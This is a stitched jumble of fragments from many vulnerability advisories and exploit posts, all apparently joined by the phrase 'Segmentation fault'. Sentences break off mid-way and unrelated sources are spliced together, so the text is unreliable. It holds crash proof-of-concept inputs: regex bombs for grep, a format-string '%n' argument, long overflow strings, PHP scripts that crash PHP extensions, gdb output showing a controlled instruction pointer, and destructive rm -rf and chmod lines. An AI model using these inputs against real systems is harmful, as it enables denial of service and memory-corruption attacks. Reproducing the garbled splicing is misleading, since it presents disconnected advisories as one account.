Segmentation fault
return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
There are many attack vectors:
grep(1):
cx@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
We need to use 1..8000 or a bigger value to cause a stack overflow.
As a result:
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
and compile it, we can manipulate the format string.
Let's try to run example:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...
(gdb) r %99999999999999999999n
uint8 padding_length;
};
*/
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
iconv(1, $a, 1);
?>
(gdb) run 1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1217608000 (LWP 29444)]
0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6
2) iconv_mime_decode_headers()
to see the difference:
[cx@82 /www]$ php define.php 8999999
Out of memory
[cx@82 /www]$ php define.php 9999999
Segmentation fault: 11
(gdb) bt
#0 0x28745eb0 in strrchr () from /lib/libc.so.7
#1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
Execution of code : NO
Privilege escalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Exploit by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Description : When elfdump analyzes an "evil" elf, the application crashes
and causes a Segmentation fault: 11
Affected OS:
- FreeBSD:
- 5.5 - TESTED AND FOUND
- 6.2 - TESTED AND FOUND
- 6.3 - TESTED AND FOUND
<?php
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("*",333333),0x39);
?>
cx@cx64:/www$ php zip.php
Segmentation fault
---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
Loaded symbols for /usr/libexec/ld.so
0x001f39e9 in select () from /usr/lib/libc.so.58.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0026d951 in memcpy () from /usr/lib/libc.so.58.0
crash in regcomp()
..
in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c <memset+44>: rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0: Cannot access memory at address 0x0
...
}
--- CUT ---
Because the variable 'in' is of type 'char', characters above 0x80 lead to negative indices.
This vulnerability may lead to an out-of-bounds read and theoretically cause a Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where the .rodata section before the base64_reverse_table
table causes this situation.
I have added some extra debug output in the lighttpd source code to see if this vulnerability is
triggered correctly. Here is the output for one of the examples:
tell()
telldir()
When given a wrong number of arguments, those functions will
attempt to perform a comparison between an unallocated memory
zone and a given register, resulting in a segmentation fault:
jonathan@blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
application to stop running unexpectedly,
for example:
Anon@localhost % flv2mpeg4 Video.flv Video.mpg
Segmentation fault (core dumped)
in this case the mpg extension is incorrect
Anon@localhost % flv2mpeg4 Video.flv `perl -e '{print "A"x4000,".avi"}'`
Segmentation fault (core dumped)
This pointer is finally used in floating point arithmetic to read a
pointer into the FPU stack from an unmapped location, resulting in an
invalid pointer dereference and ultimately in a segmentation fault:
Program received signal SIGSEGV, Segmentation fault.
- -------------------------------------------------------------------------[regs]
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0 0x0000003fec682958 in memcpy () from /lib64/libc.so.6
\[x4141414141414109].\[x4141414141414108].\[x4141414141410e41].\[x4141414141414141].\[x4138414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].\[x4141414141414141].AAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.cos.pl
0 1 1 50 50 50
) = 318
fflush(0x40187860) = 0
strcpy(0x81f0660, "\\[x4141414141414109].\\[x41414141"...) = 0x81f0660
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@lost-coder mtr-0.72]# gdb -q ./mtr core
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
- ---
will crash for different values, for example {2444492804, 2147483648,
2147483649, 2554462209} (when rdi is out of range, 2^31 to 2^32, under 64-bit Linux).
Program received signal SIGSEGV, Segmentation fault.
0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0 0x00007fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2 0x00000000006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7eb7068)
at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
#3 0x00000000006c0b00 in execute (op_array=0x1168568) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107
..
Program received signal SIGSEGV, Segmentation fault.
0x00000000006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 "9223372036854775808", flags=32767,
error=0xffffffff00000000) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65 n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;
(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
22/06/2010 14:53:36.650 editcp (372968) Recibida señal (sig=11).
bash-3.2# /tmp/dbx -C core
reading symbolic information ...warning: no source compiled with -g
Segmentation fault in lsConnectionCached at 0x10008298
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11
(/tmp/dbx) where
lsConnectionCached(0x41ffffff) at 0x10008298
SOCKSclose(0x41ffffff) at 0x10006548
mbstring.func_overload setting within .htaccess, which causes this
setting to be applied to other virtual hosts on the same server.
CVE-2009-1271
The JSON_parser function allows a denial of service (segmentation fault)
via a malformed string to the json_decode API function.
Furthermore, two updates originally scheduled for the next point update for
oldstable are included in the etch package:
* Date: 10/12/2008
* Software: Sophos SAVScan 4.33.0 for Linux
--[ Synopsis:
Sophos Antivirus deterministically crashes (segmentation fault)
when analyzing corrupted packed files for multiple packers :
armadillo, asprotect, asprotectSKE. The same behavior has also
been observed when analyzing corrupted CAB files.
TERM TSTP], 8) = 0
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0
16147 time(NULL) = 1245456547
16147 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
16147 time(NULL) = 1245456547
16147 write(2, "090620 2:09:07 - mysqld got sig"..., 266) = 266
16147 write(2, "We will try our best to scrape u"..., 176) = 176
16147 write(2, "key_buffer_size=8388600\n", 24) = 24
16147 write(2, "read_buffer_size=131072\n", 24) = 24
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> [...]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1234381104 (LWP 5982)]
> 0xb5ef84e7 in ?? () from /usr/lib/libkhtml.so.
I sent a mail to KDE's security mailing list [1] and received an answer
from Dirk Mueller several days later. He wrote that the HTML code triggers
circumstances in which the attacker can modify or add database entries
but does not have permissions to truncate the file (CVE-2008-7068).
The JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x
before 5.2.9 allows remote attackers to cause a denial of service
(segmentation fault) via a malformed string to the json_decode API
function (CVE-2009-1271).
- Fixed upstream bug #48378 (exif_read_data() segfaults on certain
corrupted .jpeg files) (CVE-2009-2687).
When fed with an html page featuring a very large SIZE parameter
in the SELECT tag, Opera deterministically segfaults on the
following instruction:
Program received signal SIGSEGV, Segmentation fault.
-----------------------------------------------------------------[regs]
eax:00000000 ebx:786C7FF8 ecx:0000001D edx:00000008 eflags:00010206
esi:5E063FF8 edi:00368084 esp:BFE5672C ebp:BFE56738 eip:080BACEB
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s z a P c
[0073:080BACEB]---------------------------------------------------[code]
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 1080238208 (LWP 2461)]
(no debugging symbols found)
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1080238208 (LWP 2461)]
0x42424242 in ?? ()
(gdb) info registers
eax 0x1 1
ecx 0x8068430 134644784
> ?>
>
> result:
> (gdb) run ./3.php
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread -1215031616 (LWP 11156)]
> 0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6
>
>
> ========
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/
/*** 2003 / 12 /23 - PRIVATE CODE ***/
/*** Program terminated with signal 11, Segmentation fault. ***/
/*** #0 0xbeefdead in ?? () ***/
/***********************************************************************************/